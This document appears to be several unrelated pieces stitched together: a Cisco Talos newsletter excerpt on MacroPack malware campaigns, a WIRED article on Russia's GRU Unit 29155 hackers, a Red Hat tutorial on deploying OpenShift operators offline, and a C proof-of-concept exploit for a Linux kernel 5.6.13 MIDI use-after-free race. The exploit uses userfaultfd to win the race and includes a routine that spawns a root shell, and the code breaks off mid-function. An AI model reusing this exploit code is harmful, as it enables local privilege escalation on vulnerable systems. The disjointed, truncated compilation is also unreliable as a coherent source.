Our friends at Cisco Duo also have a few other great recommendations for getting people to enroll in MFA, but in my opinion, mandatory enrollment is best enrollment. If I had never displayed that screen on Yahoo’s login page, I wouldn’t have even thought twice about how secure my account was. And seeing a red “!” next to my password gave off an immediate sign that my password needed to be improved, which is something I wish other sites would start doing.  

It’s not like having my fantasy football login credentials compromised would be the end of the world, but when it comes to something more high stakes, there are a few small UI steps sites could take to help nudge us in the right direction. 

**The one big thing **

Threat actors are increasingly using a traditional Red Teaming tool called MacroPack to create new malware payloads. These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT). Several different actors are using this tactic based on files uploaded to VirusTotal that Talos analyzed. They are written in different languages and rely on different themes centered on different geographies, which leads us to believe these are disparate campaigns.  

**Why do I care? **

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures. 

**So now what? **

Talos released a new Snort rule set and several ClamAV signatures to detect and block the malicious files Talos analyzed as part of this research. Our blog post also has an in-depth breakdown of the four major themes used across these malicious documents, information that could be crucial to informing potential targets about these threats.  

**Top security headlines of the week **

**A new report from Google’s Threat Analysis Group found that Russia’s APT29 is exploiting some of the same vulnerabilities as two popular spyware vendors.** The analysis comes from watering hole attacks that researchers saw in the wild between November 2023 and July 2024 targeting Mongolian government websites. APT29, largely thought to be connected to Russia’s government, exploited the same vulnerabilities in Apple iOS WebKit and Google Chrome that two spyware vendors, Intellexa and NSO Group, are also known to use. The actor (also known as Cozy Bear and Midnight Blizzard) compromised the government-controlled websites to embed malicious payloads in hidden iframes on web pages. These iframes pointed users to attacker-controlled websites, where the exploits were deployed to steal user data from iOS and Android devices. Intellexa, which Cisco Talos has reported on several times, was recently blacklisted by the U.S. government for its role in creating and distributing the Predator spyware. And the Israeli NSO Group is infamous for its Pegasus spyware, commonly used to target at-risk individuals like journalists, politicians and activists. (Google TAG, The Record) 

**A North Korean state-sponsored actor known as Citrine Sleet is actively exploiting a zero-day vulnerability in the Google Chrome web browser to steal users’ cryptocurrency.** Microsoft wrote in an advisory regarding the vulnerability, identified as CVE-2024-7971, that users had been "targeted and compromised" by the zero-day attack. Google has since released a patch for the issue. CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow an attacker to execute remote code on the targeted machine. Citrine Sleet is believed to be based in North Korea and primarily targets financial institutions, especially those that manage cryptocurrency accounts. Its social engineering techniques focus on the cryptocurrency industry and individuals believed to be associated with it. Exploitation of the vulnerability started by tricking a victim into visiting an attacker-controlled website. Then, because of a different vulnerability in the Windows kernel, Citrine Sleet could install a rootkit on the target’s computer, essentially giving them complete control of the machine. Cryptocurrency has long been a target for North Korean state-sponsored actors, who often use the stolen currency to fund the country’s military operations. (TechCrunch, Decipher) 

**The FBI released a new warning this week that North Korean actors could soon launch a wave of cyber attacks targeting "organizations with access to large quantities of cryptocurrency-related assets or products.”** A public service announcement released Tuesday said that actors had been carrying out reconnaissance-related social engineering campaigns for months targeting individuals believed to be involved in the cryptocurrency industry, or employees of financial institutions who handle virtual currency. Most of the potential targets are found by the actors by monitoring their social media activity, particularly on professional networking or employment-related platforms. These actors also are impersonating legitimate employees, looking to gain remote employment at these companies using fake names, identities and profiles. “Given the scale and persistence of this malicious activity, even those well versed in cybersecurity practices can be vulnerable to North Korea's determination to compromise networks connected to cryptocurrency assets,” the PSA reads. (Dark Reading, FBI) 

**Can’t get enough Talos? **

*   Vulnerabilities in Microsoft apps for macOS allow stealing permissions 
*   BlackByte ransomware group targets VMware ESXi bug 
*   Cisco: BlackByte ransomware gang only posting 20% to 30% of successful attacks 
*   Bug Leaves Microsoft Apps for MacOS Open to Silent Takeovers 

**Upcoming events where you can find Talos **

**LABScon** **(Sept. 18 - 21)**  

_Scottsdale, Arizona_ 

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256**: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0    
**MD5:** 8c69830a50fb85d8a794fa46643493b2    
**Typical Filename:** AAct.exe    
**Claimed Product:** N/A     
**Detection Name:** PUA.Win.Dropper.Generic::1201 

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d   
**MD5:** fd743b55d530e0468805de0e83758fe9   
**Typical Filename:** KMSAuto Net.exe   
**Claimed Product:** KMSAuto Net   
**Detection Name:** W32.File.MalParent

The best and worst ways to get users to improve their account security

Unit 29155 of Russia’s GRU military intelligence agency—a team responsible for coup attempts, assassinations, and bombings—has branched out into brazen hacking operations with targets across the world.

Russia's military intelligence agency, the GRU, has long had a reputation as one of the world's most aggressive practitioners of sabotage, assassination, and cyber warfare, with hackers who take pride in working under the same banner as violent special forces operators. But one new group within that agency shows how the GRU may be intertwining physical and digital tactics more tightly than ever before: a hacking team, which has emerged from the same unit responsible for Russia's most notorious physical tactics, including poisonings, attempted coups, and bombings inside Western countries.

A broad group of Western government agencies from countries including the US, the UK, Ukraine, Australia, Canada, and five European countries on Thursday revealed that a hacker group known as Cadet Blizzard, Bleeding Bear, or Greyscale—one that has launched multiple hacking operations targeting Ukraine, the US, and other countries in Europe, Asia, and Latin America—is in fact part of the GRU's Unit 29155, the division of the spy agency known for its brazen acts of physical sabotage and politically motivated murder. That unit has been tied in the past, for instance, to the attempted poisoning of GRU defector Sergei Skripal with the Novichok nerve agent in the UK, which led to the death of a bystander, as well as another assassination plot in Bulgaria, the explosion of an arms depot in the Czech Republic, and a failed coup attempt in Montenegro.

Now that infamous section of the GRU appears to have developed its own active team of cyber warfare operators—distinct from those within other GRU units such as Unit 26165, broadly known as Fancy Bear or APT28, and Unit 74455, the cyberattack-focused team known as Sandworm. Since 2022, GRU Unit 29155's more recently recruited hackers have taken the lead on cyber operations, including with the data-destroying wiper malware known as Whispergate, which hit at least two dozen Ukrainian organizations on the eve of Russia's February 2022 invasion, as well as the defacement of Ukrainian government websites and the theft and leak of information from them under a fake “hacktivist” persona known as Free Civilian.

Cadet Blizzard's identification as a part of GRU Unit 29155 shows how the agency is further blurring the line between physical and cyber tactics in its approach to hybrid warfare, according to one of multiple Western intelligence agency officials whom WIRED interviewed on condition of anonymity because they weren't authorized to speak using their names. “Special forces don’t normally set up a cyber unit that mirrors their physical activities,” one official says. “This is a heavily physical operating unit, tasked with the more gruesome acts that the GRU is involved in. I find it very surprising that this unit that does very hands-on stuff is now doing cyber things from behind a keyboard.”

In addition to the joint public statement revealing Cadet Blizzard's link to the GRU's unit 29155, the US Cybersecurity and Infrastructure Security Agency published an advisory detailing the group's hacking methods and ways to spot and mitigate them. The US Department of Justice indicted five members of the group by name, all in absentia, in addition to a sixth who had been previously charged earlier in the summer without any public mention of Unit 29155.

“The GRU’s WhisperGate campaign, including targeting Ukrainian critical infrastructure and government systems of no military value, is emblematic of Russia’s abhorrent disregard for innocent civilians as it wages its unjust invasion,” the US Justice Department's assistant attorney general Matthew G. Olsen wrote in a statement. “Today’s indictment underscores that the Justice Department will use every available tool to disrupt this kind of malicious cyber activity and hold perpetrators accountable for indiscriminate and destructive targeting of the United States and our allies.”

The US State Department also posted a $10 million reward for information leading to the identification or location of members of the group, along with their photos, to its Rewards for Justice website.

A State Department poster offering $10 million for information leading to the identification or location of the five GRU unit 29155 hackers.Courtesy of the US State Department

Beyonds its previously known operations against Ukraine, Western intelligence agency officials tell WIRED that the group has also targeted a wide variety of organizations in North America, Eastern and Central Europe, Central Asia, and Latin America, such as transportation and health care sectors, government agencies, and “critical infrastructure” including “energy” infrastructure, though the officials declined to offer more specific information. The officials told WIRED that in some cases, the 29155 hackers appeared to be preparing for more disruptive cyberattacks akin to Whispergate, but didn't have confirmation that any such attacks had actually taken place.

The US Department of State in June separately revealed that the same GRU hackers who carried out Whispergate also sought to find hackable vulnerabilities in US critical infrastructure targets, “particularly the energy, government, and aerospace sectors.” The DOJ's newly unsealed indictment against the 29155 hackers alleges they probed the network of a US government agency in Maryland 63 times—though without revealing whether any such probes were success—as well as searching for vulnerabilities in the networks of targets in no fewer than 26 NATO countries.

In many cases, the 29155 hackers' intention appeared to be military espionage, according to Western intelligence agency officials. In a Central European country, for instance, they say the group breached a railway agency to spy on train shipments of supplies to Ukraine. In Ukraine itself, they say, the hackers compromised consumer surveillance cameras, perhaps to gain visibility on movement of Ukrainian troops or weapons. Ukrainian officials have previously warned that Russia has used that tactic to target missile strikes, though the intelligence officials who spoke to WIRED didn't have evidence that 29155's operations specifically had been used for that missile targeting.

The Western intelligence agency sources say that GRU Unit 29155's hacking team was formed as early as 2020, though until recent years it primarily focused on espionage rather than more disruptive cyberattacks. The creation of yet another hacking group within the GRU might seem superfluous, given that the GRU's preexisting teams units such as Sandworm and Fancy Bear have long been some of the world's most active and aggressive players in cyber warfare and espionage. But Western intelligence agency officials say that Unit 29155 was likely driven to seek its own specialized hacking team due to internal competition within the GRU, as well as the group's growing clout following the perceived success of its operations—even the botched Skripal assassination attempt. “The Skripal poisoning gave them a lot of attention and a lot of mandate,” one official says. “We assess it’s very likely that’s resulted in them getting a lot of more funds and the resources to attract the capability to start a cyber unit. Success is measured differently in the Western world and Russia.”

According to the Western intelligence officials who spoke to WIRED, the 29155 hacking group is composed of just 10 or so individuals, all of whom are relatively young GRU officers. Several individuals participated in hacking “Capture the Flag” competitions—competitive hacking simulations that are common at hacker conferences—prior to joining the GRU, and may have been recruited from those events. But the small team has also partnered with Russian cybercriminal hackers in some cases, the officials say, expanding their resources and in some instances using commodity cybercriminal malware that has made its operations more difficult to attribute to the Russian state.

One example of those criminal partnerships appears to be with Amin Timovich Stigal, a Russian hacker indicted by the US in absentia in June for allegedly aiding in Cadet Blizzard's Whispergate attacks on the Ukrainian government. The US State Department has also issued a $10 million reward for information leading to Stigal's arrest.

In addition to reliance on criminal hackers, other signs of Cadet Blizzard's level of technical skill appear to fit with intelligence officials' description of a small and relatively young team, according to one security researcher who has closely tracked the group but asked not to be named because they weren't authorized by their employer to speak about their findings. To gain initial access to target networks, the hackers largely exploited a handful of known software vulnerabilities and didn't use any so-called zero-day vulnerabilities—previously unknown hackable flaws—according to the researcher. “There’s probably not a lot of hands-on experience there. They’re following a very common operating procedure,” says the researcher. “They just figured out the exploit du jour that would give them the most mileage in their chosen domains, and they stuck with it.” In another instance of the group's lack of polish, a map of Ukraine that had been included in their defacement images and posted to hacked Ukrainian websites included the Crimean peninsula, which Russia has claimed as its own territory since 2014.

Sophistication aside, the researcher also notes that the 29155 hackers in some cases compromised their targets by breaching IT providers that serve Ukrainian and other Eastern European firms, giving them access to victims' systems and data. “Instead of kicking the front door down, they’re trying to blend in with legitimate trusted channels, trusted pathways into a network,” the researcher says.

The security researcher also notes that unlike hackers in other GRU units, Cadet Blizzard appears to have been housed in its own building, separate from the rest of the GRU, perhaps to make the team harder to link to the Unit 29155 of which they're a part. Combined with the group's command structure and criminal partnerships, it all suggests a new model for the GRU's approach to cyber warfare.

“Everything about this operation was different,” the researcher says. “It’s really going to pave the way for the future of what we see from the Russian Federation.”

_Update 9/6/2024 3:05pm ET: This story has been updated to reflect that the attempted poisoning Sergei Skripal led to the death of one bystander rather than two._

Russia’s Most Notorious Special Forces Unit Now Has Its Own Cyber Warfare Team

Deploying a Red Hat OpenShift Operator in an environment with internet access is typically straightforward. However, in industries like cyber security or the military sector, where security concerns often prohibit internet access, the process becomes more complex. In a disconnected or air-gapped environment, internet access is usually restricted or unavailable.In this article, I demonstrate the process of deploying an operator in a disconnected environment. I use the recent Red Hat OpenShift AI operator for this example, because the use of artificial intelligence is becoming crucial to many en

Deploying a Red Hat OpenShift Operator in an environment with internet access is typically straightforward. However, in industries like cyber security or the military sector, where security concerns often prohibit internet access, the process becomes more complex. In a disconnected or air-gapped environment, internet access is usually restricted or unavailable.

In this article, I demonstrate the process of deploying an operator in a disconnected environment. I use the recent Red Hat OpenShift AI operator for this example, because the use of artificial intelligence is becoming crucial to many environments.

**Prerequisites**

The steps involve saving all required images to a disk, transferring the disk to the disconnected environment, uploading the OpenShift images to a private registry, and then installing the operator

To proceed, you must have the following requirements in place:

*   OpenShift is installed in a disconnected environment
*   Object storage is available
*   A private registry is deployed in the disconnected environment

**Mirroring images from public registries to disk**

To complete the first task, you use the oc-mirror plugin, an excellent tool for managing and controlling the volume of data being mirrored.

This section requires an internet connection, because you're fetching images from public registries.

For each operator you want to install in an air-gapped environment, it's essential to carefully review the documentation. This ensures that you mirror all the necessary images and their dependencies.

The OpenShift AI Operator documentation reveals that several other operators need to be installed first. Similarly, the OpenShift Service Mesh has its own set of dependencies. Missing these dependencies won’t necessarily cause the OpenShift AI Operator installation to fail, but it could lead to issues when using it. For example, if you enable the KServe component when deploying the DataScienceCluster instance, you must also have installed Operators for Red Hat OpenShift Serverless and Red Hat OpenShift Service Mesh in order to support KServe (used by the single-model serving platform to serve large models).

The Openshift AI operator (rhods-operator) has these requirements:

*   Pipeline operator
*   Serverless operator
*   Servicemesh operator
    *   Jaeger operator
    *   Kiali operator

Red Hat Openshift AI needs extra images that can be found in the Git repository RHOAI disconnected install helper, which includes the list of extra images required for Openshift AI 2.11.

**The oc-mirror plugin**

Before using the oc-mirror plugin, you need to complete some configuration steps. Fortunately, there is comprehensive documentation available to guide you through this process.

**Install the oc-mirror plugin**

1.  To download the oc-mirror CLI plugin, navigate to the downloads page of the OpenShift Cluster Manager. Under the **OpenShift disconnected installation tools** section, click **Download** for **OpenShift Client (oc) mirror plugin** and save the file
2.  Extract the archive:
    
    $ tar xvzf oc-mirror.tar.gz  
    $ chmod +x oc-mirror
    
    Do not rename the oc-mirror file
    
3.  To install the oc-mirror CLI plugin, place the file in your PATH. For example:  
    $ sudo mv oc-mirror /usr/local/bin/
4.  Verify that the plugin for oc-mirror is installed:  
    $ oc mirror help

****Configure the oc-mirror credentials****

Next, you must configure the oc-mirror credentials. As usual, read the documentation before attempting this.

1.  Download your registry.redhat.io pull secret from Red Hat OpenShift Cluster Manager
2.  Convert your pull secret in JSON format:
    
    $ cat ./pull-secret | jq . > <path>/<pull\_secret\_file\_in\_json>
    
3.  Copy the JSON file to the .docker directory:
    
    $ mkdir ~/.docker  
    $ cp <path>/<pull\_secret\_file\_in\_json> ~/.docker/config.json
    

****Validate the oc-mirror configuration****

Validate the oc-mirror configuration:

1.  Verify that the plugin for oc-mirror is installed:  
    $ oc mirror help
    *   Note that there is no dash (-) between oc and mirror.
    *   If the command returns help options, then oc-mirror is installed.
2.  Log in to registry.redhat.io and look for a credentials are valid message:
    
    $ podman login registry.redhat.io  
    Authenticating with existing credentials for registry.redhat.io  
    **Existing credentials are valid**. Already logged in to registry.redhat.io
    

****Create the oc-mirror ISC (ImageSourceConfiguration) configuration file****

The oc-mirror tool uses an ISC configuration file to define what needs to be mirrored. This configuration allows you to specify the catalog source name and the versions of the operators you want to mirror.

To learn how to automate the creation of ISC files, read my article on developers.redhat.com.

****Find operator channel and release information****

You need to provide the oc-mirror plugin with the operator's channel and version. To get that information, get a list of the available catalogs: 

$ oc mirror list operators --catalogs --version=4.16
Available OpenShift OperatorHub catalogs:
OpenShift 4.16:
registry.redhat.io/redhat/redhat-operator-index:v4.16
registry.redhat.io/redhat/certified-operator-index:v4.16
registry.redhat.io/redhat/community-operator-index:v4.16
registry.redhat.io/redhat/redhat-marketplace-index:v4.16

**Find the available packages within the selected catalog**

In this scenario, all operators you're mirroring are from the Red Hat operator catalogs.

$ oc mirror list operators --catalog=registry.redhat.io/redhat/redhat-operator-index:v4.16
NAME                                          DISPLAY NAME                                             DEFAULT CHANNEL
3scale-operator                               Red Hat Integration - 3scale                             threescale-2.14
advanced-cluster-management                   Advanced Cluster Management for Kubernetes               release-2.9
amq-broker-rhel8                              Red Hat Integration - AMQ Broker for RHEL 8 (Multiarch)  7.11.x
amq-online                                    Red Hat Integration - AMQ Online                         stable
amq-streams                                   AMQ Streams                                              stable

**Find channels for the selected package**

Next, get the channels for the package:

$ oc mirror list operators --catalog=registry.redhat.io/redhat/redhat-operator-index:v4.16 --package=rhods-operator
NAME            DISPLAY NAME          DEFAULT CHANNEL
rhods-operator  Red Hat OpenShift AI  fast
PACKAGE         CHANNEL      HEAD
rhods-operator  alpha        rhods-operator.2.11.0
rhods-operator  beta         rhods-operator.2.4.0
rhods-operator  embedded     rhods-operator.2.7.0
rhods-operator  eus-2.8      rhods-operator.2.8.4
rhods-operator  fast         rhods-operator.2.11.0
rhods-operator  stable       rhods-operator.2.10.0
rhods-operator  stable-2.10  rhods-operator.2.10.0
rhods-operator  stable-2.8   rhods-operator.2.8.4

**Find release information in the selected channel**

Look in the output for the versions available in the selected channel.

VERSIONS  
…  
…  
2.8.1  
1.32.0  
2.10.0  
2.11.0

Repeat this process for each operator until you've gathered this information for each operator you want to mirror.

****Build the oc-mirror ISC configuration file****

If this is the first time you're creating an ISC file, use the oc mirror command to create a template.

$ oc mirror init > imageset-config.yaml

Edit the new ISC file and update it using the good catalog and the operators release information you gathered in the previous steps. Here's an example of an ISC configuration file for OpenShift AI 2.11:

$ cat redhat-op-v4.16-config\_ai.yaml
kind: ImageSetConfiguration
apiVersion: mirror.openshift.io/v1alpha2
storageConfig:
  local:
    path: /path/to/disk-rh-ai/metadata
mirror:
  operators:
  - catalog: registry.redhat.io/redhat/redhat-operator-index:v4.16
    targetCatalog: redhat-catalog-v4.16
    packages:
    - name: "jaeger-product"
      channels:
      - name: "stable"
        minVersion: "1.57.0-7"
    - name: "kiali-ossm"
      channels:
      - name: "stable"
        minVersion: "1.73.8"
    - name: "openshift-pipelines-operator-rh"
      channels:
      - name: "latest"
        minVersion: "1.15.1"
    - name: "rhods-operator"
      channels:
      - name: "fast"
        minVersion: "2.11.0"
    - name: "serverless-operator"
      channels:
      - name: "stable"
        minVersion: "1.33.1"
    - name: "servicemeshoperator"
      channels:
      - name: "stable"
        minVersion: "2.5.2-0"
  additionalImages:   
    - name: quay.io/integreatly/prometheus-blackbox-exporter@sha256:35b9d2c1002201723b7f7a9f54e9406b2ec4b5b0f73d114f47c70e15956103b5
    - name: quay.io/modh/caikit-nlp@sha256:0cde6c26e02ec398aea959a1a1bcdc615b86821adb41989e81d03de01124545c
    - name: quay.io/modh/caikit-tgis-serving@sha256:4e907ce35a3767f5be2f3175a1854e8d4456c43b78cf3df4305bceabcbf0d6e2
…
…
…

Finally, create a directory for the image's TAR file, and then run the command:

$ mkdir disk-rh-ai
$ oc mirror --verbose 3 --config=redhat-op-v4.16-config\_ai.yaml file://disk-rh-ai

Once complete, the TAR file is in the disk-rh-ai directory you created:

$ ls -ltr disk-rh-ai/
drwxr-xr-x. 3 admin admin           17 Aug  1 10:56 oc-mirror-workspace
-rw-r--r--. 1 admin admin 176802807808 Aug  1 11:29 mirror\_seq1\_000000.tar
drwxr-x---. 3 admin admin           21 Aug  1 11:29 metadata

**Move the TAR file to the disconnected environment**

The operational procedures and security requirements can vary significantly from one organization to another. For example, in certain highly restricted environments, you must copy the TAR file to a portable disk, which you take to your disconnected environment's security team for review.

**Mirroring the operator from disk to private registry**

Once the data has been moved to the disconnected environment, you can begin pushing the images in your private registry. Because you've used the oc-mirror plugin to push all necessary container images, you must configure the tools accordingly, with the credential information pointing to your private registry instead of the Red Hat public registry.

Here is an example of the oc-mirror credential configuration for a private registry:

$ cat ~/.docker/config.json 
{
  "auths": {
    "quaylab.redhat.com:8443": {
      "auth": "aW5pdDpVUjiAYzJiOGcxTVc01djQcGh6PQ==",
      "email": "ebeaudoi@example.com"
    }
}

**Upload the container’s images to your private registry**

Create a directory to copy the TAR file, and to serve as the destination for “oc mirror” output:

$ mkdir disk-rh-ai
$ cp mirror\_seq1\_000000.tar disk-rh-ai/
$ cd disk-rh-ai

Execute the oc mirror command to upload the container’s images to your private registry

$ oc mirror --verbose 3 \\
--from=./mirror\_seq1\_000000.tar \\
docker://quaylab.redhat.com:8443/redhat-v416

Once complete, you get the following directories with similar files:

$ ls -ltr oc-mirror-workspace/results-1722527218/
total 60
drwxr-xr-x. 2 admin admin     6 Aug  1 11:46 charts
drwxr-xr-x. 2 admin admin     6 Aug  1 12:47 release-signatures
-rw-r--r--. 1 admin admin 50289 Aug  1 12:48 mapping.txt
-rwxr-xr-x. 1 admin admin   264 Aug  1 12:48 catalogSource-cs-redhat-catalog-v4-16.yaml
-rwxr-xr-x. 1 admin admin  2384 Aug  1 12:48 imageContentSourcePolicy.yaml

**Configure the Openshift catalog**

Keeping the Openshift default catalogs in a disconnected environment would just trigger unnecessary errors, so disable the default OperatorHub catalog sources:

$ oc patch OperatorHub cluster --type json -p '\[{"op": "add", "path": "/spec/disableAllDefaultSources", "value": true}\]'

Create a new catalog referring to your private registry using the YAML files generated by the oc-mirror plugin output.

**Log in with cluster-admin privileges**

You must be logged in to your OpenShift instance as a user with cluster-admin privileges. To confirm:

$ oc login -u admin -p redhat https://api.quaylab.redhat.com:6443
$ oc whoami
admin

**Create the ICSP file using Openshift CLI**

Now you can create the ICSP file:

$ oc apply -f oc-mirror-workspace/results-1722527218/imageContentSourcePolicy.yaml 
…
imagecontentsourcepolicy.operator.openshift.io/generic-0 created
imagecontentsourcepolicy.operator.openshift.io/operator-0 created

**Create the Red Hat catalog using the Openshift CLI**

Next, create the Red Hat catalog:

$ oc apply -f oc-mirror-workspace/results-1722527218/catalogSource-cs-redhat-catalog-v4-16.yaml 
…
catalogsource.operators.coreos.com/cs-redhat-catalog-v4-16 created

Verify that you can see the catalog in the mirrored operators in **Operators > OperatorHub**:

**Configure the OpenShift internal registry**

An OpenShift internal registry is a dependency for OpenShift Data Science and OpenShift AI in releases prior to 2.10. For a test cluster, you can use emptyDir. Do not use emptyDir for a production cluster.

$ oc patch configs.imageregistry.operator.openshift.io cluster \\
--type merge --patch '{"spec":{"storage":{"emptyDir":{}}}}' \\
config.imageregistry.operator.openshift.io/cluster 
$ oc patch configs.imageregistry.operator.openshift.io cluster \\
--type merge --patch '{"spec":{"managementState":"Managed"}}' \\ 
config.imageregistry.operator.openshift.io/cluster

**Install the AI operators**

I suggest using the OpenShift UI to install the operators. Once you have the OpenShift cluster UI open, follow these steps:

1.  Click on **Operators > OperatorHub**
2.  Select the operator to install
3.  Keep the default settings and click **Install**

Repeat this process for each operator:

*   Kiali operator
*   Jaeger operator
*   Pipeline operator
*   Serverless operator
*   Servicemesh operator
*   Openshift AI

**Create the RHOAI instance**

After the OpenShift AI Operator is successfully installed, you must create a **DataScienceCluster** instance.

1.  In the web console, click **Operators > Installed Operators**, and then select **Red Hat OpenShift AI Operator**
2.  Click the **Data Science Cluster** tab
3.  Click **Create DataScienceCluster** 
    
4.  In the UI, select **YAML view** to see the installed components. You have two options:
    
    *   **Managed**: The Operator actively manages the component, installs it, and tries to keep it active. The Operator upgrades the component only if it is safe to do so
    *   **Removed**: The Operator actively manages the component but does not install it. If the component is already installed, the Operator tries to remove it
    
5.  Click the **Create** button to continue

**Access the Red Hat AI dashboard**

At this point,the Openshift AI Data Science cluster instance has been successfully deployed. The OpenShift AI dashboard has its own UI.

1.  To access the OpenShift AI dashboard, click the Grid icon application launcher at the top of the screen
    
2.  Right-click on **Red Hat OpenShift AI** and copy the URL of your OpenShift AI instance
3.  Paste the URL into a web browser to navigate to the dashboard
    

**Conclusion**

Working in a disconnected environment presents significant challenges and adds complexity to the application development process. This mode of operation requires enhanced control over how your applications interact with the internet. Using the right tools is crucial for managing data efficiently and minimizing your workload. In this blog, I've demonstrated how to use the oc-mirror plugin, which I believe is the best approach for this scenario. It provides enhanced control over the volume of data you need to handle, streamlines the process, and improves efficiency.

**If you're interested in knowing more about Red Hat AI, click here. If you want to know more about Openshift in disconnected environment, click here.**

Deploying Red Hat OpenShift Operators in a disconnected environment

Proof of concept exploit that uses a use-after-free vulnerability due to a race condition in MIDI devices in Linux Kernel version 5.6.13.

// gcc -o exploit exploit.c -masm=intel -static -s -lpthread  
#define _GNU_SOURCE  
#include <stdio.h>  
#include <stdlib.h>  
#include <stdbool.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
#include <sys/ioctl.h>  
#include <errno.h>  
#include <string.h>  
#include <unistd.h>  
#include <stdint.h>  
#include <sound/asound.h>  
#include <sys/mman.h>  
#include <sys/syscall.h>  
#include <linux/userfaultfd.h>  
#include <sys/timerfd.h>  
#include <sys/ipc.h>  
#include <sys/msg.h>  
#include <pthread.h>  
#include <poll.h>

#define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \  
                        } while (0)

                        #define ADDRESS_PAGE_FAULT1 0x1337000  
#define ADDRESS_PAGE_FAULT2 0x3331000  
#define ADDRESS_PAGE_FAULT3 0x5551000  
#define PAGE_SIZE 0x1000  
#define DRIVER_RAWMIDI "/dev/snd/midiC0D0"

#define SNDRV_RAWMIDI_STREAM_OUTPUT 0

uint32_t uffd;  
uint32_t fd1, fd2, fd3;  
uint64_t next;  
uint64_t fake_table;

pthread_t thread[6];

bool release_page_fault = false;

static void *page;

unsigned long pivot;  
unsigned long kernel_base;  
unsigned long timerfd_tmrproc;

unsigned long usr_cs, usr_ss, usr_rflags, usr_sp;

struct args_trigger  
{  
    char *addr;  
    int size;  
    uint32_t fd;  
};

void hexdump(uint64_t *buf, uint64_t size)  
{  
    for (int i = 0; i < size / 8; i += 2)  
    {  
        printf("0x%x ", i * 8);  
        printf("%016lx %016lx\n", buf[i], buf[i + 1]);  
    }  
}

static void save_state()  
{  
    __asm__ __volatile__(  
    "movq %0, cs;"  
    "movq %1, ss;"  
    "pushfq;"  
    "popq %2;"  
    "movq %3, %%rsp\n"  
    : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags), "=r" (usr_sp) : : "memory" );  
}

static void getRootShell()  
{  
    if(getuid())  
    {  
        printf("[-] Failed to get a root");  
        exit(0);  
    }

    printf("[+] uid : %d\n", getuid());  
    printf("[+] Got root.\n");

    execl("/bin/sh", "sh", NULL);  
}

void register_userfaultfd(uint64_t *range)  
{  
    struct uffdio_api uffdio_api;  
    struct uffdio_register uffdio_register;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);

    if (uffd == -1)  
    {  
        perror("[-] userfaultfd");  
        exit(0);  
    }

    uffdio_api.api = UFFD_API;  
    uffdio_api.features = 0;

    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)  
    {  
        perror("[-] ioctl");  
        exit(0);  
    }

    printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE);

    uffdio_register.range.start = (uint64_t) range;  
    uffdio_register.range.len = PAGE_SIZE;  
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;

    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)  
    {  
        perror("[-] ioctl");  
        exit(0);  
    }

    puts("[+] Userfaultfd registered");  
}

void *handler_userfaultfd(void *args)  
{  
    uint64_t uffd = *(uint64_t *)args;

    struct uffd_msg msg;  
    struct uffdio_copy uffdio_copy;  
    uint64_t nread;  
    void *page2 = NULL;

    if ((page2 = mmap((void *)0xdead000, PAGE_SIZE * 5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    uint64_t m_ts = 0x000000000000ffff;  
    memcpy(page2, (char *) &m_ts, 8);

    while (true)  
    {  
        struct pollfd pollfd;  
        int nready;

        pollfd.fd = uffd;  
        pollfd.events = POLLIN;

                nready = poll(&pollfd, 1, -1);

        if (nready == -1)  
        {  
            perror("[-] poll");  
            exit(0);  
        }

        nread = read(uffd, &msg, sizeof(msg));

                if (nread == 0)  
        {  
            perror("[-] EOF on userfaultfd!\n");  
            exit(0);  
        }

        if (nread == -1)  
        {  
            perror("[-] read");  
            exit(0);  
        }

        char *page_fault_location = (char *)msg.arg.pagefault.address;

        if (msg.event != UFFD_EVENT_PAGEFAULT)  
        {  
            perror("[-] Unexpected event on userfaultfd");  
            exit(0);  
        }

        if (msg.arg.pagefault.address == (void *)0x1337000 || msg.arg.pagefault.address == (void *)0x3331000 || msg.arg.pagefault.address == (void *)0x5551000)  
        {  
            printf("[+] Page Fault triggered on address 0x%llx\n", msg.arg.pagefault.address);

            if(msg.arg.pagefault.address == (void *)0x5551000)  
            {  
                memcpy(page2, (char *) &fake_table, 8);  
            }

            while (release_page_fault == false);

            uffdio_copy.src = (uint64_t) page2;  
            uffdio_copy.dst = (uint64_t) msg.arg.pagefault.address &~(PAGE_SIZE - 1);  
            uffdio_copy.len = PAGE_SIZE;  
            uffdio_copy.mode = 0;  
